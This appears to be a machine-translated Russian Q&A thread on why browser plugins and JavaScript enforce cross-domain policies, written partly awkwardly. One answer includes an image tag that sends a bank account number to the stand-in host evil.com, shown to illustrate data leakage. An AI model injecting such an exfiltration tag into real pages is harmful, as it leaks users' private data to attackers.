2009-09-20 3 views
-2

слегка туманный вопрос:Silverlight и Flash-и Javascript политика Междоменной

Этот вопрос связан с попыток потребляющих без АФСА потоков в Silverlight с использованием MediaStreamSource в качестве источника MediaElement. Проблемы с перекрестными доменами здесь очень разочаровывают.

Обычно связь между доменами не разрешается в Интернете.

Если я правильно понял, скажем, что вредоносный сайт/внедренный объект A может отправлять запросы на защищенный сайт B, с которым пользователь входит в систему, файлы cookie cookie отправляются, а затем идут плохие вещи.

В Flash/Silverlight ситуация улучшена файлами политики перекрестных доменов на хосте (например, B), разрешающими или запрещающими комм от других доменов, но это все еще ограничивает попытку анализа медиапотоков из других доменов.

Не лучше ли было бы запретить куки-файлы, отправляемые с A-> B, а не запрещать все сообщения?

Что мне не хватает? Какие другие принципы лежат за существующими правилами/реализациями перекрестных доменов?

ответ

1

Мотивы междоменных политик - это не только куки/сеансы как таковые. В те дни, когда веб-контент был просто «глупым» HTML и изображениями, не было реальной проблемы безопасности, если на сайте B была показана страница, загружаемая изображениями сайт A. И если возникла проблема, не связанная с безопасностью (например, желая предотвратить hotli nking по причинам IP), обслуживающий сайт может потребовать сеанс или тому подобное. Но теперь эти веб-ресурсы включают в себя такие сценарии, как Flash, SilverLight, JS, iFrames и двоичные потоки (что может быть что угодно), если эти ресурсы остаются доступными для скриптов при отображении на странице с другого сайта, риски безопасности слишком возможны.

Таким образом, междоменные политики в основном отражают концессию, согласно которой нецелесообразно ожидать, что сайты «откажутся» от таких рисков, заблокировав доступ к активным активам вручную (они должны делать это, если они хотят заблокировать горячие образы, или требуют сеанс для определенных страниц). Бремя возвращается к дефолту с более безопасным случаем, так что обслуживающий сайт должен «выбирать» для такого риска, конкретно определяя, какие активы должны предоставлять доступ к междоменным доменам, и кто их сделает доступным.

1

Неправильное использование файлов cookie cookie (XSRF, некоторые сценарии XSS) является лишь частью проблемы. Также довольно легко отправить информацию с «хорошего» сайта на «злую» через querystring (например, захватить некоторые данные с банковской страницы и отправить ее на evil.com путем включения <image src="http://evil.com/1px.gif?bankaccount=1122334455"/>

Блокировка файлов cookie может ограничить доступ с плохой сайт для хорошего, но вы также должны защищать случаи, когда инъекция скрипта или другие атаки выставляют данные на доверенном сайте, который затем может быть передан на плохой сайт, и который не требует куки.

Смежные вопросы